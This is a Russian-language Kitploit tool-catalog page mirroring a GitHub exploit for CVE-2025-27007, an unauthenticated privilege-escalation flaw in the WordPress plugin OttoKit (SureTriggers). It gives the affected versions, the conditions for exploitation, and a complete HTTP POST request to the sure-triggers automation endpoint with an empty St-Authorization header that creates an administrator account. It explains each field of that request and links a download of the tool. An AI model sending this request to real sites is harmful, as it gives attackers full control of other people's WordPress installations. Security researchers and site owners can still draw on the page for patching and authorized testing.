Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27007-OttoKit-exploit — эксплуатация CVE-2025-27007, критической уязвимости неаутентифицированного повышения привилегий в плагине WordPress OttoKit (ранее SureTriggers) | Kitploit
Инструменты/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-27007-OttoKit-exploit

эксплуатация CVE-2025-27007, критической уязвимости неаутентифицированного повышения привилегий в плагине WordPress OttoKit (ранее SureTriggers)

Репозиторий
21 год назадЕщё не проверено

CVE-2025-27007: Уязвимость повышения привилегий в OttoKit (SureTriggers)

Эксплуатация CVE-2025-27007 — критической уязвимости, позволяющей неавторизованному пользователю повысить привилегии в плагине OttoKit (ранее известном как SureTriggers) для WordPress. В этом репозитории описывается, как злоумышленник может создать учётную запись администратора на уязвимом сайте WordPress.

Затрагиваемые версии

  • Все версии OttoKit (SureTriggers) ≤ 1.0.82.
  • Исправлено в версии 1.0.83.

Условия эксплуатации

Уязвимость может быть использована при следующих условиях:

  1. OttoKit должен быть установлен и активирован на целевом сайте WordPress.
  2. Плагин не инициализирован (например, в базе данных не задан API-ключ или "secret_key").
  3. На целевом сайте доступна конечная точка REST API '/wp-json/sure-triggers/v1/automation/action'.

HTTP-запрос

Следующий запрос направляется к конечной точке /wp-json/sure-triggers/v1/automation/action для создания учётной записи администратора:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


Пояснение запроса

  • Конечная точка: POST /wp-json/sure-triggers/v1/automation/action

  • St-Authorization: (пусто): Обход аутентификации, когда плагин не настроен.

  • selected_options[user_name]: Имя пользователя для новой учётной записи (например, new_admin).

  • selected_options[user_email]: Электронная почта для новой учётной записи (например, [email protected]).

  • selected_options[password]: Пароль для новой учётной записи (например, StrongP@ssw0rd123).

  • selected_options[role]: Установлено значение administrator для предоставления полных привилегий.

  • type_event: Установлено значение create_user_if_not_exists для запуска создания пользователя.

Скачать инструмент